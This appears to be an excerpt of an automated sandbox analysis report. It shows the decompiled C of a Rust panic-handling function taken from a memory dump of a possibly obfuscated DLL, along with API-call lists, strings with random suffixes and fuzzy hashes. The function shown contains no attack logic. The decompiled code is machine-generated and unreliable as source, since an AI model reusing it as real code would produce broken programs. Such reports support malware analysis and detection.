                          • Instruction ID: 8de080832b58f426c96d0a70e7f468c3cc97a69ba5982230c040036e882c9d5c
                          • Opcode Fuzzy Hash: 4684716b9897f53484347832e253adfa1106237a29cef055a9d3cd590a99d7d4
                          • Instruction Fuzzy Hash: 121237B1A00B009FE761CFA5C994B97BBF5BF09308F00491DD6AA87A90E776B449CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC8C0, Relevance: 32.0, APIs: 14, Strings: 4, Instructions: 477memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 69%
                          			E6ECDC8C0(long _a4, signed int _a8) {
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t190;
				void* _t194;
				void _t195;
				intOrPtr* _t196;
				signed int _t197;
				signed int _t199;
				char* _t201;
				long _t202;
				long _t203;
				void* _t204;
				void* _t205;
				long _t206;
				void _t209;
				void _t210;
				void* _t219;
				void* _t222;
				long _t226;
				void* _t235;
				void* _t245;
				void* _t247;
				void* _t248;
				char** _t251;
				char** _t252;
				void* _t256;
				void* _t260;
				void _t264;
				char _t265;
				signed char _t267;
				void _t270;
				intOrPtr _t273;
				void* _t275;
				char* _t276;
				void _t277;
				void* _t280;
				intOrPtr _t291;
				intOrPtr _t295;
				void _t298;
				long _t302;
				void* _t307;
				void* _t308;
				void* _t309;
				signed int _t310;
				signed int _t312;
				void* _t318;
				intOrPtr* _t324;
				long _t326;
				void* _t327;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t335;
				intOrPtr _t336;
				void* _t347;
				void* _t360;
				long _t361;

				_v32 = _t336;
				_v20 = 0xffffffff;
				_v24 = E6ECE3B50;
				_t264 = _t270;
				_t332 = 1;
				_t330 = _t307;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				asm("lock xadd [0x6ed2adc0], esi");
				_t190 = E6ECDD1B0(_t264, _t330);
				_t337 = _t190;
				if(_t190 == 0) {
					_t190 = E6ECF6EE0(_t264,  &M6ED1D0E7, 0x46, _t337,  &_v68, 0x6ed1d060, 0x6ed1d1ac);
					_t336 = _t336 + 0xc;
					asm("ud2");
				}
				_t308 = _a8;
				_t273 =  *_t190 + 1;
				 *_t190 = _t273;
				if(_t332 < 0 || _t273 >= 3) {
					__eflags = _t273 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6ed1cd60;
						_v120 = 0x6ed1d014;
						_v68 = 0x6ed1da50;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t308;
						_t309 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6ECD2640;
						_v52 =  &_v80;
						_v48 = 1;
						_t194 = E6ECDD2A0( &_v100, __eflags);
						__eflags = _t194 - 3;
						if(_t194 == 3) {
							_v20 = 0;
							_v36 = _t309;
							 *((intOrPtr*)( *((intOrPtr*)(_t309 + 4))))( *_t309);
							_t336 = _t336 + 4;
							L11:
							_t332 = _v36;
							_t302 =  *(_t332 + 4);
							__eflags =  *(4 + _t302);
							if( *(4 + _t302) != 0) {
								_t256 =  *_t332;
								__eflags =  *((intOrPtr*)(_t302 + 8)) - 9;
								if( *((intOrPtr*)(_t302 + 8)) >= 9) {
									_t256 =  *(_t256 - 4);
								}
								HeapFree( *0x6ed2adc8, 0, _t256);
							}
							_t194 = HeapFree( *0x6ed2adc8, 0, _t332);
						}
						goto L16;
					}
					_t327 =  &_v68;
					_v68 = 0x6ed1da14;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6ed1cd60;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t194 = E6ECDD2A0( &_v124, __eflags);
					__eflags = _t194 - 3;
					if(_t194 != 3) {
						goto L16;
					} else {
						_v20 = 1;
						_v36 = _t327;
						 *((intOrPtr*)( *((intOrPtr*)(_t327 + 4))))( *_t327);
						_t336 = _t336 + 4;
						goto L11;
					}
				} else {
					_v132 = _t273;
					__imp__AcquireSRWLockShared(0x6ed2adbc);
					_v144 = 0x6ed2adbc;
					_v20 = 2;
					_v136 = _t264;
					_v140 = _t330;
					_t260 =  *((intOrPtr*)(_t330 + 0x10))(_t264);
					_t336 = _t336 + 4;
					_v36 = _t260;
					_v40 = _t308;
					_t194 = E6ECDD1B0(_t264, _t330);
					_t330 = _v40;
					_t340 = _t194;
					if(_t194 != 0) {
						L17:
						__eflags =  *_t194 - 1;
						_t275 = 1;
						if( *_t194 <= 1) {
							_t195 =  *0x6ed2adb0; // 0x0
							_t310 = _a8;
							__eflags = _t195 - 2;
							if(_t195 == 2) {
								_t275 = 0;
								goto L19;
							}
							__eflags = _t195 - 1;
							if(_t195 == 1) {
								_t275 = 4;
								goto L19;
							}
							__eflags = _t195;
							if(_t195 != 0) {
								goto L19;
							}
							E6ECDD530(_t264,  &_v68, _t330, _t332);
							_t330 = _v40;
							_t248 = _v68;
							__eflags = _t248;
							if(_t248 != 0) {
								goto L68;
							}
							_t267 = 5;
							goto L86;
						}
						_t310 = _a8;
						goto L19;
					} else {
						E6ECF6EE0(_t264,  &M6ED1D0E7, 0x46, _t340,  &_v68, 0x6ed1d060, 0x6ed1d1ac);
						_t336 = _t336 + 0xc;
						L61:
						asm("ud2");
						L62:
						_t276 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t201 = 0xc;
						L21:
						_v100 = _t276;
						_v96 = _t201;
						_t202 =  *0x6ed2a044; // 0x0
						if(_t202 == 0) {
							_t280 = 0x6ed2a044;
							_t202 = E6ECE2B10(_t264, 0x6ed2a044, _t330, _t332);
						}
						_t194 = TlsGetValue(_t202);
						if(_t194 <= 1) {
							L42:
							_t203 =  *0x6ed2a044; // 0x0
							__eflags = _t203;
							if(_t203 == 0) {
								_t280 = 0x6ed2a044;
								_t203 = E6ECE2B10(_t264, 0x6ed2a044, _t330, _t332);
							}
							_t194 = TlsGetValue(_t203);
							__eflags = _t194;
							if(_t194 == 0) {
								_t204 =  *0x6ed2adc8; // 0x760000
								__eflags = _t204;
								if(_t204 != 0) {
									L66:
									_t205 = HeapAlloc(_t204, 0, 0x10);
									__eflags = _t205;
									if(__eflags != 0) {
										 *_t205 = 0;
										 *(_t205 + 0xc) = 0x6ed2a044;
										_t332 = _t205;
										_t206 =  *0x6ed2a044; // 0x0
										__eflags = _t206;
										if(_t206 == 0) {
											_v36 = _t332;
											_t206 = E6ECE2B10(_t264, 0x6ed2a044, _t330, _t332);
											_t332 = _v36;
										}
										_t194 = TlsSetValue(_t206, _t332);
										goto L75;
									}
									L67:
									_t248 = E6ECF6C30(_t264, 0x10, 4, _t330, _t332, __eflags);
									asm("ud2");
									L68:
									_t326 = _v60;
									_t298 = _v64;
									__eflags = _t326 - 4;
									if(_t326 == 4) {
										__eflags =  *_t248 - 0x6c6c7566;
										if( *_t248 != 0x6c6c7566) {
											L83:
											_t332 = 2;
											_t267 = 0;
											__eflags = 0;
											L84:
											__eflags = _t298;
											if(_t298 != 0) {
												HeapFree( *0x6ed2adc8, 0, _t248);
											}
											L86:
											__eflags = _t267 - 5;
											_t310 = _a8;
											_t269 =  !=  ? _t332 : 1;
											_t275 =  !=  ? _t267 & 0x000000ff : 4;
											_t142 =  !=  ? _t332 : 1;
											_t264 =  *0x6ed2adb0;
											 *0x6ed2adb0 =  !=  ? _t332 : 1;
											L19:
											_v148 = _t310;
											_v128 = _t275;
											_t59 = _t330 + 0xc; // 0x6ece3440
											_t196 =  *_t59;
											_v40 = _t196;
											_t197 =  *_t196(_v36);
											_t336 = _t336 + 4;
											_t312 = _t310 ^ 0x7ef2a91e | _t197 ^ 0xecc7bcf4;
											__eflags = _t312;
											if(__eflags != 0) {
												_t199 = _v40(_v36);
												_t336 = _t336 + 4;
												__eflags = _t312 ^ 0xe43a67d8 | _t199 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L62;
												}
												_t251 = _v36;
												_t276 =  *_t251;
												_t201 = _t251[2];
												goto L21;
											}
											_t252 = _v36;
											_t276 =  *_t252;
											_t201 = _t252[1];
											goto L21;
										}
										_t267 = 1;
										_t332 = 3;
										goto L84;
									}
									__eflags = _t326 - 1;
									if(_t326 != 1) {
										goto L83;
									}
									__eflags =  *_t248 - 0x30;
									if( *_t248 != 0x30) {
										goto L83;
									}
									_t267 = 4;
									_t332 = 1;
									goto L84;
								}
								_t204 = GetProcessHeap();
								__eflags = _t204;
								if(__eflags == 0) {
									goto L67;
								}
								 *0x6ed2adc8 = _t204;
								goto L66;
							} else {
								_t332 = _t194;
								__eflags = _t194 - 1;
								if(_t194 != 1) {
									L75:
									_t277 =  *(_t332 + 8);
									__eflags =  *_t332;
									_t136 = _t332 + 4; // 0x4
									_t330 = _t136;
									 *_t332 = 1;
									 *(_t332 + 4) = 0;
									 *(_t332 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t277;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t194 = E6ECDC800(_t277);
											}
										}
									}
									goto L26;
								}
								_v84 = 0;
								_v36 = 0;
								_t210 = 0;
								__eflags = 0;
								goto L47;
							}
						} else {
							_t330 = _t194;
							if( *_t194 != 1) {
								goto L42;
							}
							_t330 = _t330 + 4;
							L26:
							if( *_t330 != 0) {
								E6ECF6EE0(_t264, "already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl", 0x10, __eflags,  &_v68, 0x6ed1d050, 0x6ed1d720);
								_t336 = _t336 + 0xc;
								goto L61;
							}
							 *_t330 = 0xffffffff;
							_t332 =  *(_t330 + 4);
							if(_t332 == 0) {
								_v36 = _t330;
								_v20 = 8;
								_t247 = E6ECDC690(_t264, _t330, _t332);
								_t330 = _v36;
								_t332 = _t247;
								_t194 =  *(_t330 + 4);
								_t347 = _t194;
								if(_t347 != 0) {
									asm("lock dec dword [eax]");
									if(_t347 == 0) {
										_t280 =  *(_t330 + 4);
										_t194 = E6ECDC800(_t280);
									}
								}
								 *(_t330 + 4) = _t332;
							}
							asm("lock inc dword [esi]");
							if(_t347 <= 0) {
								L16:
								asm("ud2");
								asm("ud2");
								goto L17;
							} else {
								 *_t330 =  *_t330 + 1;
								_v84 = _t332;
								_v36 = _t332;
								if(_t332 != 0) {
									_t209 =  *(_t332 + 0x10);
									__eflags = _t209;
									_t280 =  ==  ? _t209 : _t332 + 0x10;
									if(__eflags != 0) {
										L103:
										_t210 =  *_t280;
										_t280 =  *((intOrPtr*)(_t280 + 4)) - 1;
										L104:
										_v20 = 3;
										L47:
										_v124 = 0x6ed1d8fc;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t317 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t212 =  !=  ? _t280 : 9;
										_v80 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t318 =  &_v124;
										_v76 =  !=  ? _t280 : 9;
										_v68 =  &_v80;
										_v64 = 0x6ecdde50;
										_v60 =  &_v100;
										_v56 = 0x6ecdde50;
										_v52 =  &_v148;
										_v48 = E6ECDDE70;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6ECDD2A0( &_v92, _t210) == 3) {
											_v20 = 7;
											_v40 = _t318;
											 *((intOrPtr*)( *((intOrPtr*)(_t318 + 4))))( *_t318);
											_t336 = _t336 + 4;
											_t335 = _v40;
											_t295 =  *((intOrPtr*)(_t335 + 4));
											if( *((intOrPtr*)(_t295 + 4)) != 0) {
												_t245 =  *_t335;
												if( *((intOrPtr*)(_t295 + 8)) >= 9) {
													_t245 =  *(_t245 - 4);
												}
												HeapFree( *0x6ed2adc8, 0, _t245);
											}
											HeapFree( *0x6ed2adc8, 0, _t335);
										}
										_t265 = _v128;
										_t219 =  <  ? (_t265 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t219 == 0) {
											__imp__AcquireSRWLockExclusive(0x6ed2adac);
											_v68 = 0x6ed1d2c0;
											_v64 = 1;
											_v152 = 0x6ed2adac;
											_v41 = _t265;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6ECDDEE0;
											_v52 =  &_v124;
											_v48 = 1;
											_t222 = E6ECDD2A0( &_v92, __eflags);
											_t333 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6ed2adac);
											__eflags = _t222 - 3;
											if(__eflags != 0) {
												goto L94;
											}
											_v20 = 5;
											_v40 = _t333;
											 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
											_t336 = _t336 + 4;
											goto L89;
										} else {
											if(_t219 == 1) {
												L94:
												_t360 = _v36;
												if(_t360 != 0) {
													asm("lock dec dword [eax]");
													if(_t360 == 0) {
														E6ECDC800(_v84);
													}
												}
												_t334 = _v140;
												_t331 = _v136;
												_t361 = _v72;
												if(_t361 != 0) {
													asm("lock dec dword [eax]");
													if(_t361 == 0) {
														E6ECDDC20(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6ed2adbc);
												_t362 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6ed1da8c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6ed1cd60;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t226 = E6ECDD2A0( &_v80, _t362);
													_v120 =  &_v68;
													_v124 = _t226;
													E6ECDD460( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t280 = _t331;
												E6ECDD440(_t280, _t334);
												asm("ud2");
												goto L103;
											}
											 *0x6ed2a040 = 0;
											_t356 =  *0x6ed2a040;
											if( *0x6ed2a040 == 0) {
												goto L94;
											}
											_t324 =  &_v68;
											_v68 = 0x6ed1d96c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6ed1cd60;
											_v48 = 0;
											_v20 = 3;
											if(E6ECDD2A0( &_v92, _t356) != 3) {
												goto L94;
											}
											_v40 = _t324;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t336 = _t336 + 4;
											L89:
											_t291 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t291 + 4)) != 0) {
												_t235 =  *_v40;
												if( *((intOrPtr*)(_t291 + 8)) >= 9) {
													_t235 =  *(_t235 - 4);
												}
												HeapFree( *0x6ed2adc8, 0, _t235);
											}
											HeapFree( *0x6ed2adc8, 0, _v40);
											goto L94;
										}
									}
									_t210 = 0;
									goto L104;
								}
								_t210 = 0;
								goto L47;
							}
						}
					}
				}
			}






























































































                          0x6ecdc8cc
                          0x6ecdc8cf
                          0x6ecdc8d6
                          0x6ecdc8dd
                          0x6ecdc8e2
                          0x6ecdc8e7
                          0x6ecdc8f0
                          0x6ecdc8f3
                          0x6ecdc8f9
                          0x6ecdc901
                          0x6ecdc906
                          0x6ecdc908
                          0x6ecdc922
                          0x6ecdc927
                          0x6ecdc92a
                          0x6ecdc92a
                          0x6ecdc92e
                          0x6ecdc931
                          0x6ecdc934
                          0x6ecdc936
                          0x6ecdc9aa
                          0x6ecdc9ad
                          0x6ecdca0a
                          0x6ecdca11
                          0x6ecdca1b
                          0x6ecdca22
                          0x6ecdca29
                          0x6ecdca2d
                          0x6ecdca34
                          0x6ecdca3b
                          0x6ecdca41
                          0x6ecdca44
                          0x6ecdca47
                          0x6ecdca4d
                          0x6ecdca54
                          0x6ecdca57
                          0x6ecdca5e
                          0x6ecdca63
                          0x6ecdca65
                          0x6ecdca6c
                          0x6ecdca74
                          0x6ecdca77
                          0x6ecdca79
                          0x6ecdca7c
                          0x6ecdca7c
                          0x6ecdca7f
                          0x6ecdca82
                          0x6ecdca86
                          0x6ecdca88
                          0x6ecdca8a
                          0x6ecdca8e
                          0x6ecdca90
                          0x6ecdca90
                          0x6ecdca9c
                          0x6ecdca9c
                          0x6ecdcaaa
                          0x6ecdcaaa
                          0x00000000
                          0x6ecdca65
                          0x6ecdc9b2
                          0x6ecdc9b5
                          0x6ecdc9bc
                          0x6ecdc9c3
                          0x6ecdc9ca
                          0x6ecdc9d1
                          0x6ecdc9d5
                          0x6ecdc9dc
                          0x6ecdc9e3
                          0x6ecdc9e8
                          0x6ecdc9ea
                          0x00000000
                          0x6ecdc9f0
                          0x6ecdc9f5
                          0x6ecdc9fd
                          0x6ecdca00
                          0x6ecdca02
                          0x00000000
                          0x6ecdca02
                          0x6ecdc93d
                          0x6ecdc93d
                          0x6ecdc945
                          0x6ecdc94b
                          0x6ecdc955
                          0x6ecdc95c
                          0x6ecdc963
                          0x6ecdc969
                          0x6ecdc96c
                          0x6ecdc96f
                          0x6ecdc972
                          0x6ecdc975
                          0x6ecdc97a
                          0x6ecdc97d
                          0x6ecdc97f
                          0x6ecdcab3
                          0x6ecdcab3
                          0x6ecdcab6
                          0x6ecdcab8
                          0x6ecdcb8b
                          0x6ecdcb90
                          0x6ecdcb93
                          0x6ecdcb96
                          0x6ecdcd97
                          0x00000000
                          0x6ecdcd97
                          0x6ecdcb9c
                          0x6ecdcb9f
                          0x6ecdcd90
                          0x00000000
                          0x6ecdcd90
                          0x6ecdcba5
                          0x6ecdcba7
                          0x00000000
                          0x00000000
                          0x6ecdcbb0
                          0x6ecdcbb5
                          0x6ecdcbb8
                          0x6ecdcbbb
                          0x6ecdcbbd
                          0x00000000
                          0x00000000
                          0x6ecdcbc3
                          0x00000000
                          0x6ecdcbc3
                          0x6ecdcabe
                          0x00000000
                          0x6ecdc985
                          0x6ecdc99d
                          0x6ecdc9a2
                          0x6ecdcdbe
                          0x6ecdcdbe
                          0x6ecdcdc0
                          0x6ecdcdc0
                          0x6ecdcdc5
                          0x6ecdcaf3
                          0x6ecdcaf3
                          0x6ecdcaf6
                          0x6ecdcaf9
                          0x6ecdcb00
                          0x6ecdcb02
                          0x6ecdcb07
                          0x6ecdcb07
                          0x6ecdcb0d
                          0x6ecdcb16
                          0x6ecdcbf3
                          0x6ecdcbf3
                          0x6ecdcbf8
                          0x6ecdcbfa
                          0x6ecdcbfc
                          0x6ecdcc01
                          0x6ecdcc01
                          0x6ecdcc07
                          0x6ecdcc0d
                          0x6ecdcc0f
                          0x6ecdcdcf
                          0x6ecdcdd4
                          0x6ecdcdd6
                          0x6ecdcde6
                          0x6ecdcdeb
                          0x6ecdcdf0
                          0x6ecdcdf2
                          0x6ecdce32
                          0x6ecdce38
                          0x6ecdce3f
                          0x6ecdce41
                          0x6ecdce46
                          0x6ecdce48
                          0x6ecdce4f
                          0x6ecdce52
                          0x6ecdce57
                          0x6ecdce57
                          0x6ecdce5c
                          0x00000000
                          0x6ecdce5c
                          0x6ecdcdf4
                          0x6ecdcdfe
                          0x6ecdce03
                          0x6ecdce05
                          0x6ecdce05
                          0x6ecdce08
                          0x6ecdce0b
                          0x6ecdce0e
                          0x6ecdceb8
                          0x6ecdcebe
                          0x6ecdcec9
                          0x6ecdcec9
                          0x6ecdcece
                          0x6ecdcece
                          0x6ecdced0
                          0x6ecdced0
                          0x6ecdced2
                          0x6ecdcedd
                          0x6ecdcedd
                          0x6ecdcee2
                          0x6ecdcee2
                          0x6ecdceed
                          0x6ecdcef5
                          0x6ecdcef8
                          0x6ecdcefb
                          0x6ecdcefb
                          0x6ecdcefb
                          0x6ecdcac1
                          0x6ecdcac1
                          0x6ecdcac7
                          0x6ecdcaca
                          0x6ecdcaca
                          0x6ecdcad0
                          0x6ecdcad3
                          0x6ecdcad5
                          0x6ecdcae3
                          0x6ecdcae3
                          0x6ecdcae5
                          0x6ecdcbcd
                          0x6ecdcbd0
                          0x6ecdcbde
                          0x6ecdcbe0
                          0x00000000
                          0x00000000
                          0x6ecdcbe6
                          0x6ecdcbe9
                          0x6ecdcbeb
                          0x00000000
                          0x6ecdcbeb
                          0x6ecdcaeb
                          0x6ecdcaee
                          0x6ecdcaf0
                          0x00000000
                          0x6ecdcaf0
                          0x6ecdcec0
                          0x6ecdcec2
                          0x00000000
                          0x6ecdcec2
                          0x6ecdce14
                          0x6ecdce17
                          0x00000000
                          0x00000000
                          0x6ecdce1d
                          0x6ecdce20
                          0x00000000
                          0x00000000
                          0x6ecdce26
                          0x6ecdce28
                          0x00000000
                          0x6ecdce28
                          0x6ecdcdd8
                          0x6ecdcddd
                          0x6ecdcddf
                          0x00000000
                          0x00000000
                          0x6ecdcde1
                          0x00000000
                          0x6ecdcc15
                          0x6ecdcc15
                          0x6ecdcc17
                          0x6ecdcc1a
                          0x6ecdce62
                          0x6ecdce62
                          0x6ecdce65
                          0x6ecdce68
                          0x6ecdce68
                          0x6ecdce6b
                          0x6ecdce71
                          0x6ecdce78
                          0x6ecdce7f
                          0x6ecdce85
                          0x6ecdce87
                          0x6ecdce8d
                          0x6ecdce90
                          0x6ecdce96
                          0x6ecdce96
                          0x6ecdce90
                          0x6ecdce87
                          0x00000000
                          0x6ecdce7f
                          0x6ecdcc20
                          0x6ecdcc27
                          0x6ecdcc2e
                          0x6ecdcc2e
                          0x00000000
                          0x6ecdcc2e
                          0x6ecdcb1c
                          0x6ecdcb1f
                          0x6ecdcb21
                          0x00000000
                          0x00000000
                          0x6ecdcb27
                          0x6ecdcb2a
                          0x6ecdcb2d
                          0x6ecdcdb6
                          0x6ecdcdbb
                          0x00000000
                          0x6ecdcdbb
                          0x6ecdcb33
                          0x6ecdcb39
                          0x6ecdcb3e
                          0x6ecdcb40
                          0x6ecdcb43
                          0x6ecdcb4a
                          0x6ecdcb4f
                          0x6ecdcb52
                          0x6ecdcb54
                          0x6ecdcb57
                          0x6ecdcb59
                          0x6ecdcb5b
                          0x6ecdcb5e
                          0x6ecdcb60
                          0x6ecdcb63
                          0x6ecdcb63
                          0x6ecdcb5e
                          0x6ecdcb68
                          0x6ecdcb68
                          0x6ecdcb6b
                          0x6ecdcb6e
                          0x6ecdcaaf
                          0x6ecdcaaf
                          0x6ecdcab1
                          0x00000000
                          0x6ecdcb74
                          0x6ecdcb74
                          0x6ecdcb78
                          0x6ecdcb7b
                          0x6ecdcb7e
                          0x6ecdcea0
                          0x6ecdcea6
                          0x6ecdcea8
                          0x6ecdceab
                          0x6ecdd062
                          0x6ecdd062
                          0x6ecdd067
                          0x6ecdd068
                          0x6ecdd068
                          0x6ecdcc30
                          0x6ecdcc37
                          0x6ecdcc3e
                          0x6ecdcc45
                          0x6ecdcc4c
                          0x6ecdcc50
                          0x6ecdcc57
                          0x6ecdcc5e
                          0x6ecdcc65
                          0x6ecdcc6d
                          0x6ecdcc70
                          0x6ecdcc76
                          0x6ecdcc79
                          0x6ecdcc7f
                          0x6ecdcc85
                          0x6ecdcc8c
                          0x6ecdcc95
                          0x6ecdcc9c
                          0x6ecdcca2
                          0x6ecdcca9
                          0x6ecdccac
                          0x6ecdccba
                          0x6ecdccc1
                          0x6ecdccc9
                          0x6ecdcccc
                          0x6ecdccce
                          0x6ecdccd1
                          0x6ecdccd4
                          0x6ecdccdb
                          0x6ecdccdd
                          0x6ecdcce3
                          0x6ecdcce5
                          0x6ecdcce5
                          0x6ecdccf1
                          0x6ecdccf1
                          0x6ecdccff
                          0x6ecdccff
                          0x6ecdcd04
                          0x6ecdcd15
                          0x6ecdcd1a
                          0x6ecdcf0b
                          0x6ecdcf1a
                          0x6ecdcf21
                          0x6ecdcf28
                          0x6ecdcf32
                          0x6ecdcf35
                          0x6ecdcf3c
                          0x6ecdcf43
                          0x6ecdcf49
                          0x6ecdcf50
                          0x6ecdcf53
                          0x6ecdcf5a
                          0x6ecdcf5f
                          0x6ecdcf68
                          0x6ecdcf6e
                          0x6ecdcf71
                          0x00000000
                          0x00000000
                          0x6ecdcf78
                          0x6ecdcf80
                          0x6ecdcf83
                          0x6ecdcf85
                          0x00000000
                          0x6ecdcd20
                          0x6ecdcd23
                          0x6ecdcfc0
                          0x6ecdcfc3
                          0x6ecdcfc5
                          0x6ecdcfc7
                          0x6ecdcfca
                          0x6ecdcfcf
                          0x6ecdcfcf
                          0x6ecdcfca
                          0x6ecdcfd7
                          0x6ecdcfdd
                          0x6ecdcfe3
                          0x6ecdcfe5
                          0x6ecdcfe7
                          0x6ecdcfea
                          0x6ecdcfef
                          0x6ecdcfef
                          0x6ecdcfea
                          0x6ecdcff9
                          0x6ecdcfff
                          0x6ecdd003
                          0x6ecdd00a
                          0x6ecdd012
                          0x6ecdd019
                          0x6ecdd020
                          0x6ecdd027
                          0x6ecdd02e
                          0x6ecdd032
                          0x6ecdd039
                          0x6ecdd040
                          0x6ecdd048
                          0x6ecdd04b
                          0x6ecdd04e
                          0x6ecdd053
                          0x6ecdd055
                          0x6ecdd055
                          0x6ecdd057
                          0x6ecdd05b
                          0x6ecdd060
                          0x00000000
                          0x6ecdd060
                          0x6ecdcd2b
                          0x6ecdcd31
                          0x6ecdcd33
                          0x00000000
                          0x00000000
                          0x6ecdcd3c
                          0x6ecdcd3f
                          0x6ecdcd46
                          0x6ecdcd4d
                          0x6ecdcd54
                          0x6ecdcd5b
                          0x6ecdcd62
                          0x6ecdcd70
                          0x00000000
                          0x00000000
                          0x6ecdcd7b
                          0x6ecdcd7e
                          0x6ecdcd86
                          0x6ecdcd88
                          0x6ecdcf88
                          0x6ecdcf8b
                          0x6ecdcf92
                          0x6ecdcf9b
                          0x6ecdcf9d
                          0x6ecdcf9f
                          0x6ecdcf9f
                          0x6ecdcfab
                          0x6ecdcfab
                          0x6ecdcfbb
                          0x00000000
                          0x6ecdcfbb
                          0x6ecdcd1a
                          0x6ecdceb1
                          0x00000000
                          0x6ecdceb1
                          0x6ecdcb84
                          0x00000000
                          0x6ecdcb84
                          0x6ecdcb6e
                          0x6ecdcb16
                          0x6ecdc97f

                          APIs
                            • Part of subcall function 6ECDD1B0: TlsGetValue.KERNEL32(00000000,00000001,6ECDC906), ref: 6ECDD1BB
                            • Part of subcall function 6ECDD1B0: TlsGetValue.KERNEL32(00000000), ref: 6ECDD1F3
                          • AcquireSRWLockShared.KERNEL32(6ED2ADBC), ref: 6ECDC945
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6ECDCA9C
                          • HeapFree.KERNEL32(00000000,?), ref: 6ECDCAAA
                          • TlsGetValue.KERNEL32(00000000), ref: 6ECDCB0D
                          • TlsGetValue.KERNEL32(00000000), ref: 6ECDCC07
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6ECDCCF1
                          • HeapFree.KERNEL32(00000000,?), ref: 6ECDCCFF
                          • GetProcessHeap.KERNEL32 ref: 6ECDCDD8
                          • HeapAlloc.KERNEL32(00760000,00000000,00000010), ref: 6ECDCDEB
                          • TlsSetValue.KERNEL32(00000000,00000000,00760000,00000000,00000010), ref: 6ECDCE5C
                          • HeapFree.KERNEL32(00000000,00000000,00760000,00000000,00000010), ref: 6ECDCEDD
                          Strings
                          • cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf, xrefs: 6ECDC90D, 6ECDC988
                          • full, xrefs: 6ECDCEB8
                          • Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6ECDCDC0
                          • already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl, xrefs: 6ECDCDA1
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Heap$FreeValue$AcquireAllocLockProcessShared
                          • String ID: Box<dyn Any><unnamed>thread '' panicked at '', $already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl$cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf$full
                          • API String ID: 2275035175-1955203421
                          • Opcode ID: ecc89232d1b43d63a50719bf45e05966f4f03dfde6f164f2533a3116e5f9c6c5
                          • Instruction ID: f3c2f586aecd66abb2df4b08346bc2d052c6e8e459c049b0cf05aefafff8bbde
                          • Opcode Fuzzy Hash: ecc89232d1b43d63a50719bf45e05966f4f03dfde6f164f2533a3116e5f9c6c5
                          • Instruction Fuzzy Hash: 581224B0A002199FEB10CFE4C994BDEBBB5FF45304F108569D615AB294E776A84ACF90
                          Uniqueness

